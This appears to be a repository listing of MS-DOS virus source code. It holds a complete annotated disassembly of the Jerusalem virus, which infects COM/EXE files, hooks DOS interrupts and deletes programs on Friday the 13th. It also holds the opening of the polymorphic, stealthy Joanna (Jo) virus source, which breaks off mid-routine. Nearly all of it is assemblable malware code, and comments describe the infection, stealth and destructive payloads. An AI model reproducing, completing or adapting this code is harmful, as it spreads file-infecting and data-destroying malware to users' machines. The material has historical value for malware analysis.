;0310 00 06 B1 04 D3 EA 83 C2-10 CD 21 32 C0 CF 2E 83 ..1.Sj.B.M!2@O..
;0320 3E 1F 00 02 75 17 50 53-51 52 55 B8 02 06 B7 87 >...u.PSQRU8..
MSDOS/J-Index/Virus.MSDOS.Unknown.jerusalm.asm
+797
View File
@@ -0,0 +1,797 @@
; The 'Jerusalem' virus
; Disassembled by Joe Hirst (Tel: 0273-26105) January 1989.
; The disassembly has been tested by re-assembly using MASM 5.0
RAM SEGMENT AT 0
; System data
ORG 3FCH
BW03FC DW ?
BB03FE DB ?
ORG 2CH
ENV_SG DW ? ; Segment address of environment
RAM ENDS
CODE SEGMENT BYTE PUBLIC 'CODE'
ASSUME CS:CODE,DS:NOTHING,ES:RAM
START: JMP BP0010
DB 'sU'
VR_SIG DB 'MsDos'
VIR_RT EQU THIS DWORD
V_RTOF DW 0100H
V_RTSG DW 1C26H
DEL_SW DB 0 ; Delete program switch
BEGIN DW 0 ; Initial value for AX
F_SIZE DW 2A74H ; Total file size
INT_08 EQU THIS DWORD
I08OFF DW 00ABH ; Int 8 offset
I08SEG DW 17CDH ; Int 8 segment
INT_21 EQU THIS DWORD
I21OFF DW 1460H ; Int 21H offset
I21SEG DW 029FH ; Int 21H segment
INT_24 EQU THIS DWORD
I24OFF DW 0556H ; Int 24H offset
I24SEG DW 189BH ; Int 24H segment
TCOUNT DW 3A53H ; Timer count
; Fields passed by spare virus call
SPAR01 DW 0 ; 00 Spare call field 1 - AX
SP_RET EQU THIS DWORD
SPAR02 DW 0 ; 02 Spare call field 2 - IP
SPAR03 DW 0 ; 04 Spare call field 3 - CS
SPAR04 DW 0 ; 06 Spare call field 4 - SP
SPAR05 DW 0 ; 08 Spare call field 5 - SS
SPAR06 DW 0 ; 0A Spare call field 6
SPAR07 DW 0 ; 0C Spare call field 7
SPAR08 DW 0 ; 0E Spare call field 8
ST_ES1 DW 1BB5H ; Original ES
SET_PA DW 0080H
; Program parameter block
PPB_01 DW 0 ; Environment address
PPB_02 DW 0080H ; Command line offset
PPB_03 DW 1BB5H ; Command line segment
PPB_04 DW 005CH ; FCB1 offset
PPB_05 DW 1BB5H ; FCB1 segment
PPB_06 DW 006CH ; FCB2 offset
PPB_07 DW 1BB5H ; FCB2 segment
PRG_SP DW 0710H ; Initial stack pointer store
PRG_SS DW 14EDH ; Initial stack segment store
PROGRM EQU THIS DWORD
PRGOFF DW 00C5H ; Initial code offset store
PRGSEG DW 14EDH ; Initial code segment store
SS_ST1 DW 0246H
SS_ST2 DB 00A1H
EXE_SW DB 0 ; EXE switch - 0 = .COM extension
; .EXE header store
EXEHED DB 4DH, 5AH ; 00 .EXE header ident
EXHD01 DW 00F0H ; 02 Bytes in last page
EXHD02 DW 00B2H ; 04 Size of file in pages
EXHD03 DW 0138H ; 06 Number of relocation entries
EXHD04 DW 0060H ; 08 Size of header in paragraphs
EXHD05 DW 06D3H ; 0A Minimum extra storage required
EXHD06 DW -1 ; 0C Maximum extra storage required
EXHD07 DW 155EH ; 0E Initial stack segment
EXHD08 DW 0710H ; 10 Initial stack pointer
EXHD09 DW 1984H ; 12 Negative checksum
EXHD10 DW 00C5H ; 14 Initial code offset
EXHD11 DW 155EH ; 16 Initial code segment
DB 01EH, 000H, 000H, 000H
SIGBUF DB 037H, 020H, 02AH, 02AH, 02AH
F_HAND DW 5 ; File handle
F_ATTS DW 0020H ; File attributes
F_DATE DW 0F30H ; File date
F_TIME DW 6000H ; File time
BYTSEC DW 0200H ; Bytes per sector
PARAGR DW 0010H ; Size of a paragraph
F_SIZ1 DW 5BE0H ; Low-order file size
F_SIZ2 DW 1 ; High-order file size
F_PATH EQU THIS DWORD
FPTHOF DW 41B9H ; Program pathname offset
FPTHSG DW 9B2AH ; Program pathname segment
COM_CM DB 'COMMAND.COM'
MEM_SW DW 1 ; Memory allocated switch
DB 4 DUP (0)
; This section seems to assume a COM origin of 100H
BP0010:
CLD
MOV AH,0E0H ; Virus "are you there" call
INT 21H ; DOS service (Virus - 1)
CMP AH,0E0H ; Test for unchanged
JNB BP0020 ; Branch if invalid reply
CMP AH,3 ; Test for standard "yes"
JB BP0020 ; Branch if non-standard
MOV AH,0DDH ; Replace program
MOV DI,0100H ; Initial offset
MOV SI,OFFSET ENDADR ; Length of virus
ADD SI,DI ; Add initial offset
MOV CX,CS:F_SIZE[DI] ; Get total filesize
INT 21H ; DOS service (Virus - 2)
BP0020:
MOV AX,CS ; Get current segment
ADD AX,10H ; Address past PSP
MOV SS,AX ; \ Set up stack
MOV SP,0700H ; /
PUSH AX ; Segment for return
MOV AX,OFFSET BP0030 ; \ Offset for return
PUSH AX ; /
RETF ; "Return" to next instruction
; We now have an origin of zero
BP0030:
CLD
PUSH ES
MOV ST_ES1,ES ; Save original ES
MOV PPB_03,ES ; \
MOV PPB_05,ES ; ) Segments in PPB
MOV PPB_07,ES ; /
MOV AX,ES ; \ Segment relocation factor
ADD AX,10H ; /
ADD PRGSEG,AX ; Initial code segment store
ADD PRG_SS,AX ; Initial stack segment store
MOV AH,0E0H ; Virus "are you there" call
INT 21H ; DOS service (Virus - 1)
CMP AH,0E0H ; Test for unchanged
JNB BP0040 ; Branch if not
CMP AH,3 ; Test for standard "yes"
POP ES
MOV SS,PRG_SS ; Initial stack segment store
MOV SP,PRG_SP ; Initial stack pointer store
JMP PROGRM ; Start of actual program
; Virus is not already active
BP0040:
XOR AX,AX ; \ Address page zero
MOV ES,AX ; /
MOV AX,BW03FC ; \ Save system area data (1)
MOV SS_ST1,AX ; /
MOV AL,BB03FE ; \ Save system area data (2)
MOV SS_ST2,AL ; /
MOV BW03FC,0A5F3H ; Store REPZ MOVSW
MOV BB03FE,0CBH ; Store RETF
POP AX ; \
ADD AX,10H ; ) Address past PSP
MOV ES,AX ; /
PUSH CS ; \ Set DS to CS
POP DS ; /
MOV CX,OFFSET ENDADR ; Length of virus
SHR CX,1 ; Divide by two (word parameter)
XOR SI,SI
MOV DI,SI
PUSH ES
MOV AX,OFFSET BP0050
PUSH AX
DB 0EAH ; \ Far jump to move instruction
DW BW03FC, 0 ; /
BP0050:
MOV AX,CS
MOV SS,AX
MOV SP,0700H
XOR AX,AX ; \ Address page zero
MOV DS,AX ; /
ASSUME DS:RAM,ES:NOTHING
MOV AX,SS_ST1 ; \ Restore system area data (1)
MOV BW03FC,AX ; /
MOV AL,SS_ST2 ; \ Restore system area data (2)
MOV BB03FE,AL ; /
MOV BX,SP
MOV CL,4
SHR BX,CL
ADD BX,10H
MOV SET_PA,BX ; Save number of paragraphs
MOV AH,4AH ; Set block
MOV ES,ST_ES1 ; Get original ES
INT 21H ; DOS service (Set block)
MOV AX,3521H ; Get interrupt 21H
INT 21H ; DOS service (Get int)
MOV I21OFF,BX ; Save interrupt 21H offset
MOV I21SEG,ES ; Save interrupt 21H segment
PUSH CS ; \ Set DS to CS
POP DS ; /
ASSUME DS:CODE
MOV DX,OFFSET BP0130 ; Interrupt 21H routine
MOV AX,2521H ; Set interrupt 21H
INT 21H ; DOS service (Set int)
MOV ES,ST_ES1 ; Get original ES
ASSUME ES:RAM
MOV ES,ES:ENV_SG ; Get environment segment
XOR DI,DI ; Start of environment
MOV CX,7FFFH ; Allow for 32K environment
XOR AL,AL ; Search for zero
BP0060:
REPNZ SCASB ; Find zero
CMP ES:[DI],AL ; Is following character zero
LOOPNZ BP0060 ; Search again if not
MOV DX,DI ; Save pointer
ADD DX,3 ; Address pathname
MOV AX,4B00H ; Load and execute program
PUSH ES ; \ Set DS to ES
POP DS ; /
PUSH CS ; \ Set ES to CS
POP ES ; /
ASSUME DS:RAM,ES:NOTHING
MOV BX,OFFSET PPB_01 ; PPB (for load and execute)
PUSH DS
PUSH ES
PUSH AX
PUSH BX
PUSH CX
PUSH DX
MOV AH,2AH ; Get date
INT 21H ; DOS service (Get date)
MOV DEL_SW,0 ; Set delete program switch off
CMP CX,07C3H ; Year = 1987
JZ BP0080 ; Branch if yes
CMP AL,5 ; Day of week = Friday
JNZ BP0070 ; Branch if not
CMP DL,0DH ; Day of month = 13
JNZ BP0070 ; Branch if not
INC DEL_SW ; Set delete program switch on
JMP BP0080
BP0070:
MOV AX,3508H ; Get interrupt 8
INT 21H ; DOS service (Get int)
MOV I08OFF,BX ; Save interrupt 8 offset
MOV I08SEG,ES ; Save interrupt 8 segment
PUSH CS ; \ Set DS to CS
POP DS ; /
ASSUME DS:CODE
MOV TCOUNT,7E90H ; Start clock count (30 mins)
MOV AX,2508H ; Set interrupt 8
MOV DX,OFFSET BP0100 ; Interrupt 8 routine
INT 21H ; DOS service (Set int)
BP0080:
POP DX
POP CX
POP BX
POP AX
POP ES
POP DS
ASSUME DS:NOTHING
PUSHF ; Fake an interrupt
CALL INT_21 ; Interrupt 21H (Load and execute)
PUSH DS ; \ Set ES to DS
POP ES ; /
MOV AH,49H ; Free allocated memory
INT 21H ; DOS service (Free memory)
MOV AH,4DH ; Get return code of child process
INT 21H ; DOS service (Get return code)
MOV AH,31H ; Keep process
MOV DX,OFFSET ENDKEEP ; Length of program
MOV CL,4 ; \ Convert to paragraphs
SHR DX,CL ; /
ADD DX,10H ; And another 256 bytes
INT 21H ; DOS service (Keep process)
; Interrupt 24H
BP0090:
XOR AL,AL ; Ignore the error
IRET
; Interrupt 8
BP0100:
CMP TCOUNT,2 ; Is timer ready
JNZ BP0110 ; Branch if not
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH BP
MOV AX,0602H ; Scroll up two lines
MOV BH,87H ; Blinking white on black
MOV CX,0505H ; Start row 5 column 5
MOV DX,1010H ; End row 16 column 16
INT 10H ; VDU I/O
POP BP
POP DX
POP CX
POP BX
POP AX
BP0110:
DEC TCOUNT ; Subtract from timer count
JNZ BP0120 ; Branch if not zero
MOV TCOUNT,1 ; Set back to one
PUSH AX
PUSH CX
PUSH SI
MOV CX,4001H ; \ Waste some time
REPZ LODSB ; /
POP SI
POP CX
POP AX
BP0120:
JMP INT_08 ; Interrupt 8
; Interrupt 21H
BP0130:
PUSHF
CMP AH,0E0H ; Virus "are you there" call
JNZ BP0140 ; Branch if other call
MOV AX,0300H ; Standard "yes"
POPF
IRET
BP0140:
CMP AH,0DDH ; Virus replace program call
JZ BP0160 ; Branch if yes
CMP AH,0DEH ; Virus spare call
JZ BP0170 ; Branch if yes
CMP AX,4B00H ; Is it load and execute
JNZ BP0150 ; Branch if not
JMP BP0210 ; Process load and execute
BP0150:
POPF
JMP CS:INT_21 ; Interrupt 21H
; Replace program call
BP0160:
POP AX
POP AX ; Retrieve return offset
MOV AX,100H ; Replace with start address
MOV V_RTOF,AX ; Store in return jump
POP AX ; Retrieve return segment
MOV V_RTSG,AX ; Store in return jump
REPZ MOVSB ; Restore program to beginning
POPF
MOV AX,BEGIN ; Start with zero register
JMP VIR_RT ; Start actual program
; Spare virus call
BP0170:
ADD SP,6 ; Remove three words from stack
POPF
MOV AX,CS ; \
MOV SS,AX ; ) Set up internal stack
MOV SP,OFFSET ENDADR ; /
PUSH ES
PUSH ES
XOR DI,DI
PUSH CS ; \ Set ES to CS
POP ES ; /
MOV CX,10H ; Length to move
MOV SI,BX
MOV DI,OFFSET SPAR01
REPZ MOVSB ; Copy to SPAR01-SPAR08 inclusive
MOV AX,DS ; \ Set ES to DS
MOV ES,AX ; /
MUL PARAGR ; Size of a paragraph
ADD AX,SPAR06 ; \ Add
ADC DX,0 ; /
DIV PARAGR ; Size of a paragraph
MOV DS,AX
MOV SI,DX
MOV DI,DX
MOV BP,ES ; Save ES
MOV BX,SPAR08
OR BX,BX
JZ BP0190
BP0180:
MOV CX,8000H
REPZ MOVSW
ADD AX,1000H
ADD BP,1000H
MOV DS,AX
MOV ES,BP ; Restore ES
DEC BX
JNZ BP0180
BP0190:
MOV CX,SPAR07
REPZ MOVSB
POP AX ; Recover ES
PUSH AX ; Put it back again
ADD AX,10H ; Address past PSP
ADD SPAR05,AX ; Relocate SS
ADD SPAR03,AX ; Relocate ?
MOV AX,SPAR01
POP DS
POP ES
MOV SS,SPAR05
MOV SP,SPAR04
JMP SP_RET
; Friday 13th - Delete program
BP0200:
XOR CX,CX ; No attributes
MOV AX,4301H ; Set file attributes
INT 21H ; DOS service (Set attributes)
MOV AH,41H ; Delete directory entry
INT 21H ; DOS service (Delete entry)
MOV AX,4B00H ; Load and execute program
POPF
JMP INT_21 ; Interrupt 21H
; Process load and execute program
BP0210:
CMP DEL_SW,1 ; Test delete program switch
JZ BP0200 ; Branch to delete if on
MOV F_HAND,-1 ; No file handle
MOV MEM_SW,0 ; Set off memory allocated switch
MOV FPTHOF,DX ; Save pathname offset
MOV FPTHSG,DS ; Save pathname segment
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH SI
PUSH DI
PUSH DS
PUSH ES
CLD
MOV DI,DX ; Point to file pathname
XOR DL,DL ; Default drive
CMP BYTE PTR [DI+1],3AH ; Test second character for ':'
JNZ BP0220 ; Branch if not
MOV DL,[DI] ; Get drive letter
AND DL,1FH ; Convert to number
BP0220:
MOV AH,36H ; Get disk free space
INT 21H ; DOS service (Get disk free)
CMP AX,-1 ; Test for invalid drive
JNZ BP0240 ; Branch if not
BP0230:
JMP BP0500 ; Terminate
BP0240:
MUL BX ; Calc number of free sectors
MUL CX ; Calc number of free bytes
OR DX,DX ; Test high word of result
JNZ BP0250 ; Branch if not zero
CMP AX,OFFSET ENDADR ; Length of virus
JB BP0230 ; Terminate if less
BP0250:
MOV DX,FPTHOF ; Get pathname offset
PUSH DS ; \ Set ES to DS
POP ES ; /
XOR AL,AL ; Test character - zero
MOV CX,41H ; Maximum pathname length
REPNZ SCASB ; Find end of pathname
MOV SI,FPTHOF ; Get pathname offset
BP0260:
MOV AL,[SI] ; Get pathname character
OR AL,AL ; Test for a character
JZ BP0280 ; Finish if none
CMP AL,61H ; Test for 'a'
JB BP0270 ; Branch if less
CMP AL,7AH ; Test for 'z'
JA BP0270 ; Branch if above
SUB BYTE PTR [SI],20H ; Convert to uppercase
BP0270:
INC SI ; Address next character
JMP BP0260 ; Process next character
BP0280:
MOV CX,0BH ; Load length 11
SUB SI,CX ; Address back by length
MOV DI,OFFSET COM_CM ; 'COMMAND.COM'
PUSH CS ; \ Set ES to CS
POP ES ; /
MOV CX,0BH ; Load length again
REPZ CMPSB ; Compare
JNZ BP0290 ; Continue if not command.com
JMP BP0500 ; Terminate
BP0290:
MOV AX,4300H ; Get file attributes
INT 21H ; DOS service (Get attributes)
JB BP0300 ; Follow chain of error branches
MOV F_ATTS,CX ; Save file attributes
BP0300:
JB BP0320 ; Follow chain of error branches
XOR AL,AL ; Scan character - zero
MOV EXE_SW,AL ; Set EXE switch off
PUSH DS ; \ Set ES to DS
POP ES ; /
MOV DI,DX ; Pointer to pathname
MOV CX,41H ; Maximum pathname length
REPNZ SCASB ; Find end of pathname
CMP BYTE PTR [DI-2],4DH ; Is last letter 'M'
JZ BP0310 ; Branch if yes
CMP BYTE PTR [DI-2],6DH ; Is last letter 'm'
JZ BP0310 ; Branch if yes
INC EXE_SW ; Set EXE switch on
BP0310:
MOV AX,3D00H ; Open handle, read only
INT 21H ; DOS service (Open handle)
BP0320:
JB BP0340 ; Follow chain of error branches
MOV F_HAND,AX ; Save file handle
MOV BX,AX ; File handle
MOV AX,4202H ; Move file pointer
MOV CX,-1 ; \ End of file minus 5
MOV DX,-5 ; /
INT 21H ; DOS service (Move pointer)
JB BP0320 ; Follow chain of error branches
ADD AX,5 ; Total file size
MOV F_SIZE,AX ; Save total file size
MOV CX,5 ; Length to read
MOV DX,OFFSET SIGBUF ; Infection test buffer
MOV AX,CS ; \
MOV DS,AX ; ) Make DS & ES same as CS
MOV ES,AX ; /
ASSUME DS:CODE
MOV AH,3FH ; Read handle
INT 21H ; DOS service (Read handle)
MOV DI,DX ; Address test buffer
MOV SI,OFFSET VR_SIG ; Signature
REPZ CMPSB ; Compare signatures
JNZ BP0330 ; Branch if not infected
MOV AH,3EH ; Close handle
INT 21H ; DOS service (Close handle)
JMP BP0500 ; Terminate
BP0330:
MOV AX,3524H ; Get interrupt 24H
INT 21H ; DOS service (Get int)
MOV I24OFF,BX ; Save interrupt 24H offset
MOV I24SEG,ES ; Save interrupt 24H segment
MOV DX,OFFSET BP0090 ; Interrupt 24H routine
MOV AX,2524H ; Set interrupt 24H
INT 21H ; DOS service (Set int)
LDS DX,F_PATH ; Address program pathname
XOR CX,CX ; No attributes
MOV AX,4301H ; Set file attributes
INT 21H ; DOS service (Set attributes)
ASSUME DS:NOTHING
BP0340:
JB BP0350 ; Follow chain of error branches
MOV BX,F_HAND ; Get file handle
MOV AH,3EH ; Close handle
INT 21H ; DOS service (Close handle)
MOV F_HAND,-1 ; No file handle
MOV AX,3D02H ; Open handle read/write
INT 21H ; DOS service (Open handle)
JB BP0350 ; Follow chain of error branches
MOV F_HAND,AX ; Save file handle
MOV AX,CS ; \
MOV DS,AX ; ) Make DS & ES same as CS
MOV ES,AX ; /
ASSUME DS:CODE
MOV BX,F_HAND ; Get file handle
MOV AX,5700H ; Get file date and time
INT 21H ; DOS service (Get file date)
MOV F_DATE,DX ; Save file date
MOV F_TIME,CX ; Save file time
MOV AX,4200H ; Move file pointer
XOR CX,CX ; \ Beginning of file
MOV DX,CX ; /
INT 21H ; DOS service (Move pointer)
BP0350:
JB BP0380 ; Follow chain of error branches
CMP EXE_SW,0 ; Test EXE switch
JZ BP0360 ; Branch if off
JMP BP0400
; .COM file processing
BP0360:
MOV BX,1000H ; 64K of memory wanted
MOV AH,48H ; Allocate memory
INT 21H ; DOS service (Allocate memory)
JNB BP0370 ; Branch if successful
MOV AH,3EH ; Close handle
MOV BX,F_HAND ; Get file handle
INT 21H ; DOS service (Close handle)
JMP BP0500 ; Terminate
BP0370:
INC MEM_SW ; Set on memory allocated switch
MOV ES,AX ; Segment of allocated memory
XOR SI,SI ; Start of virus
MOV DI,SI ; Start of allocated memory
MOV CX,OFFSET ENDADR ; Length of virus
REPZ MOVSB ; Copy virus to allocated
MOV DX,DI ; Address after virus
MOV CX,F_SIZE ; Total file size
MOV BX,F_HAND ; Get file handle
PUSH ES ; \ Set DS to ES
POP DS ; /
MOV AH,3FH ; Read handle
INT 21H ; DOS service (Read handle)
BP0380:
JB BP0390 ; Follow chain of error branches
ADD DI,CX ; Add previous file size
XOR CX,CX ; \ Beginning of file
MOV DX,CX ; /
MOV AX,4200H ; Move file pointer
INT 21H ; DOS service (Move pointer)
MOV SI,OFFSET VR_SIG ; Signature
MOV CX,5 ; Length to move
REPZ MOVS [DI],CS:VR_SIG ; Copy signature to end
MOV CX,DI ; Length to write
XOR DX,DX ; Start of allocated
MOV AH,40H ; Write handle
INT 21H ; DOS service (Write handle)
BP0390:
JB BP0410 ; Follow chain of error branches
JMP BP0480 ; Free memory and reset values
; .EXE file processing
BP0400:
MOV CX,1CH ; Length of EXE header
MOV DX,OFFSET EXEHED ; .EXE header store
MOV AH,3FH ; Read handle
INT 21H ; DOS service (Read handle)
BP0410:
JB BP0430 ; Follow chain of error branches
MOV EXHD09,1984H ; Negative checksum
MOV AX,EXHD07 ; \ Store initial stack segment
MOV PRG_SS,AX ; /
MOV AX,EXHD08 ; \ Store initial stack pointer
MOV PRG_SP,AX ; /
MOV AX,EXHD10 ; \ Store initial code offset
MOV PRGOFF,AX ; /
MOV AX,EXHD11 ; \ Store initial code segment
MOV PRGSEG,AX ; /
MOV AX,EXHD02 ; Get size of file in pages
CMP EXHD01,0 ; Number of bytes in last page
JZ BP0420 ; Branch if none
DEC AX ; One less page
BP0420:
MUL BYTSEC ; Bytes per sector
ADD AX,EXHD01 ; \ Add bytes in last page
ADC DX,0 ; /
ADD AX,0FH ; \ Round up
ADC DX,0 ; /
AND AX,0FFF0H ; Clear bottom figure
MOV F_SIZ1,AX ; Save low-order file size
MOV F_SIZ2,DX ; Save high-order file size
ADD AX,OFFSET ENDADR ; \ Add virus length
ADC DX,0 ; /
BP0430:
JB BP0450 ; Follow chain of error branches
DIV BYTSEC ; Bytes per sector
OR DX,DX ; Test odd bytes
JZ BP0440 ; Branch if none
INC AX ; One more page for odd bytes
BP0440:
MOV EXHD02,AX ; Store size of file in pages
MOV EXHD01,DX ; Store bytes in last page
MOV AX,F_SIZ1 ; Low-order file size
MOV DX,F_SIZ2 ; High-order file size
DIV PARAGR ; Size of a paragraph
SUB AX,EXHD04 ; Size of header in paragraphs
MOV EXHD11,AX ; Initial code segment
MOV EXHD10,OFFSET BP0030 ; Initial code offset
MOV EXHD07,AX ; Initial stack segment
MOV EXHD08,OFFSET ENDADR ; Initial stack pointer
XOR CX,CX ; \ Beginning of file
MOV DX,CX ; /
MOV AX,4200H ; Move file pointer
INT 21H ; DOS service (Move pointer)
BP0450:
JB BP0460 ; Follow chain of error branches
MOV CX,1CH ; Length of EXE header
MOV DX,OFFSET EXEHED ; .EXE header store
MOV AH,40H ; Write handle
INT 21H ; DOS service (Write handle)
BP0460:
JB BP0470 ; Follow chain of error branches
CMP AX,CX ; Has same length been written
JNZ BP0480 ; Branch if not
MOV DX,F_SIZ1 ; Low-order file size
MOV CX,F_SIZ2 ; High-order file size
MOV AX,4200H ; Move file pointer
INT 21H ; DOS service (Move pointer)
BP0470:
JB BP0480 ; Follow chain of error branches
XOR DX,DX ; Address beginning of virus
MOV CX,OFFSET ENDADR ; Length of virus
MOV AH,40H ; Write handle
INT 21H ; DOS service (Write handle)
ASSUME DS:NOTHING
BP0480:
CMP MEM_SW,0 ; Test memory allocated switch
JZ BP0490 ; Branch if off
MOV AH,49H ; Free allocated memory
INT 21H ; DOS service (Free memory)
BP0490:
CMP F_HAND,-1 ; Test file handle
JZ BP0500 ; Terminate if none
MOV BX,F_HAND ; Get file handle
MOV DX,F_DATE ; Get file date
MOV CX,F_TIME ; Get file time
MOV AX,5701H ; Set file date and time
INT 21H ; DOS service (Set file date)
MOV AH,3EH ; Close handle
INT 21H ; DOS service (Close handle)
LDS DX,F_PATH ; Address program pathname
MOV CX,F_ATTS ; Load file attributes
MOV AX,4301H ; Set file attributes
INT 21H ; DOS service (Set attributes)
LDS DX,INT_24 ; Original interrupt 24H address
MOV AX,2524H ; Set interrupt 24H
INT 21H ; DOS service (Set int)
BP0500:
POP ES
POP DS
POP DI
POP SI
POP DX
POP CX
POP BX
POP AX
POPF
JMP INT_21 ; Interrupt 21H
DB 11 DUP (0)
ENDKEEP EQU $
; Stack area - rubbish
DB 04DH, 09BH, 018H, 004H, 000H, 000H, 000H, 000H
DB 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H
DB 000H, 001H, 000H, 000H, 000H, 000H, 000H, 032H
DB 000H, 000H, 000H, 02FH, 000H, 0FFH, 0FFH, 0FFH
DB 0FFH, 0FFH, 0FFH, 0FFH, 0FFH, 0FFH, 0FFH, 0FFH
DB 0FFH, 0FFH, 0FFH, 0FFH, 0FFH, 0FFH, 0FFH, 043H
DB 03AH, 05CH, 041H, 055H, 054H, 04FH, 045H, 058H
DB 045H, 043H, 02EH, 042H, 041H, 054H, 000H, 061H
DB 075H, 074H, 06FH, 065H, 078H, 065H, 063H, 00DH
DB 000H, 0FFH, 0FFH, 0FFH, 000H, 000H, 000H, 000H
DB 04DH, 09BH, 018H, 000H, 010H, 09AH, 0F0H, 0FEH
DB 01DH, 0F0H, 02FH, 001H, 09BH, 018H, 03CH, 001H
DB 0E9H, 092H, 000H, 073H, 055H, 04DH, 073H, 044H
DB 06FH, 073H, 000H, 001H, 026H, 01CH, 000H, 000H
DB 000H, 074H, 02AH, 0ABH, 000H, 0CDH, 017H, 060H
DB 014H, 09FH, 002H, 056H, 005H, 09BH, 018H, 053H
DB 03AH, 000H, 000H, 000H, 000H, 000H, 000H, 000H
DB 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H
DB 000H, 0B5H, 01BH, 080H, 000H, 000H, 000H, 080H
DB 000H, 0B5H, 01BH, 05CH, 000H, 0B5H, 01BH, 06CH
DB 000H, 0B5H, 01BH, 010H, 007H, 0EDH, 014H, 0C5H
DB 000H, 0EDH, 014H, 046H, 002H, 0A1H, 000H, 04DH
DB 05AH, 0F0H, 000H, 0B2H, 000H, 038H, 001H, 060H
DB 000H, 0D3H, 006H, 0FFH, 0FFH, 05EH, 015H, 010H
DB 007H, 084H, 019H, 0C5H, 000H, 05EH, 015H, 01EH
DB 000H, 000H, 000H, 037H, 020H, 02AH, 02AH, 02AH
DB 005H, 000H, 020H, 000H, 030H, 00FH, 000H, 060H
DB 000H, 002H, 010H, 000H, 0E0H, 05BH, 001H, 000H
DB 0B9H, 041H, 02AH, 09BH, 043H, 04FH, 04DH, 04DH
DB 041H, 04EH, 044H, 02EH, 043H, 04FH, 04DH, 001H
DB 000H, 000H, 000H, 000H, 000H, 0FCH, 0B4H, 0E0H
DB 0CDH, 021H, 080H, 0FCH, 0E0H, 073H, 016H, 080H
DB 0FCH, 003H, 072H, 011H, 0B4H, 0DDH, 0BFH, 000H
DB 001H, 0BEH, 010H, 007H, 003H, 0F7H, 02EH, 08BH
ENDADR EQU $
CODE ENDS
END START
MSDOS/J-Index/Virus.MSDOS.Unknown.jo1_11.asm
+429
View File
@@ -0,0 +1,429 @@
NAME Jo
PAGE 55,132
TITLE Jo Virus.
;
; This is Yet another virus from the ARCV, this one is called
; Joanna, it was written by Apache Warrior, ARCV President.
;
; It has Stealth features, it is a Resident infector of .COM files
; and uses the Cybertech Mutation Engine (TM) by Apache Warrior for
; its Polymorphic features. There is a maximum of 3 unchanged bytes
; in the Encrypted code.
;
.model tiny
code segment
ASSUME CS:CODE,DS:CODE,ES:CODE
int_21ofs equ 84h
int_21seg equ 86h
length equ offset handle-offset main
msglen equ offset oldstart-offset msg
tsrlen equ (offset findat-offset main)/10
len equ offset handle-offset main
virlen equ (offset string-offset main2)/2
decryptlen equ offset main2-offset main
org 100h
start: jmp main
db 0,0,0
main: mov si,offset main2 ; SI offset for decrypt
mov cx,virlen ; viri decrypt size
loop_1:
db 2eh,81h,2ch ; decrypt
switch: dw 0
add si,02h
dec cx
jnz loop_1
main2: call findoff ; find file ofset
findoff: pop si ;
sub si,offset findoff
push ds
push es
push cs
pop ds
push cs
pop es
mov ax,0ff05h ; Test for Scythe2 Boot
int 13h
cmp ah,0e9h ; Check for Scythe2 Boot
jnz haha ; no go on
mov ah,09h ; Display message
lea dx,[si+offset msg2]
int 21h
jmp $ ; Crash the machine
haha: mov ah,2ah ; Date Test
int 21h ;
cmp dx,1210h ; Is month the Oct.
jnz main3 ; no go on
mov ah,09h ; Display Message
lea dx,[si+offset msg]
int 21h
main3: mov di,0100h ; move old programs
push si ; start back to the start
mov ax,offset oldstart ;
add si,ax ;
mov cx,05h ;
cld ;
repz movsb ;
inst: mov ax,0ffa4h ; check to see if already instaled
int 21h
pop si ; bring back si
cmp ax,42a1h
je oldprog ; Yes return to old program
tt2: xor ax,ax ; Residency Routine
push ax
mov ax,ds ; Get MCB segment Address
dec ax ;
mov es,ax ; Put MCB segment Address in es
pop ds ;
mov ax,word ptr ds:int_21ofs ; Load Int 21h address data
mov cx,word ptr ds:int_21seg ;
mov word ptr cs:[si+int21],ax ; Move Int 21h data to store
mov word ptr cs:[si+int21+2],cx ;
cmp byte ptr es:[0],5ah ; Check for Start of MCB
jne oldprog ; If no then quit
mov ax,es:[3] ; Play with MCB to get top of
sub ax,0bch ; Memory and reserve 3,008 bytes
jb oldprog ; for Virus
mov es:[3],ax ;
sub word ptr es:[12h],0bch ;
mov es,es:[12h] ;
push ds ;
push cs ;
pop ds ; Move Virus into Memory
mov di,0100h ; space allocated above
mov cx,len+5 ;
push si ;
add si,0100h ;
rep movsb ;
pop si
pop ds
cli ; Stop Interrupts Very Inportant
mov ax,offset new21 ; Load New Int 21h handler
mov word ptr ds:int_21ofs,ax ; address and store
mov word ptr ds:int_21seg,es ;
sti ;
oldprog:
mov di,0100h ; Return to Orginal
pop es ; Program..
pop ds ;
push di ;
ret ;
int21 dd 0h ; Storage For Int 21h Address
;
; New interupt 21h Handler
;
sayitis: mov ax,42a1h ; Install Check..
iret
new21: ;nop ; Sign byte
cmp ax,0ffa4h ; Instalation Check
je sayitis
cmp ah,11h ; FCB Search file
je adjust_FCB
cmp ah,12h ; FCB Search Again
je adjust_FCB
cmp ah,4eh ; Handle Search file
je adjust_FCB
cmp ah,4fh ; Handle Search Again
je adjust_FCB
cmp ah,3dh ; Are they opening a file?
je intgo ; if no ignore
cmp ah,4bh ; Exec Function
jne noint
intgo: push ax ; 4bh, 3dh Infect file
push bx ; Handler save the Registers
push cx
push es
push si
push di
push dx
push ds
call checkit ; Call infect routine
pop ds
pop dx
pop di
pop si
pop es
pop cx
pop bx
pop ax
noint: jmp cs:[int21] ; Return to Orginal Int 21h
adjust_FCB: push es ; Stealth Routine
push bx
push si
push ax
xor si,si
and ah,40h ; Check for handle Search
jz okFCB
mov si,1 ; Set flag
okFCB: mov ah,2fh ; Get DTA Address
int 21h
pop ax ; Restore ax to orginal function
call i21 ; value call it
pushf ; save flags
push ax ; save ax error code
call adjust ; Call stealth adjust routine
pop ax ; restore registers
popf
pop si
pop bx
pop es
retf 2 ; Return to caller
adjust: pushf ; Stealth check routine
cmp si,0 ; Check flag set earlyer
je fcb1
popf
jc repurn ; Check for Handle Search error
mov ah,byte ptr es:[bx+16h] ; No error then carry on
and ah,01ah ; Check stealth stamp
cmp ah,01ah ;
jne repurn ;
sub word ptr es:[bx+1ah],len ; Infected then take the viri size
repurn: ret ; from file size.
fcb1: popf ; Same again but for the FCB
cmp al,0ffh
je meat_hook
cmp byte ptr es:[bx],0ffh
jne xx2
add bx,7
xx2: mov ah,byte ptr es:[bx+17h]
and ah,01ah
cmp ah,01ah
jne meat_hook
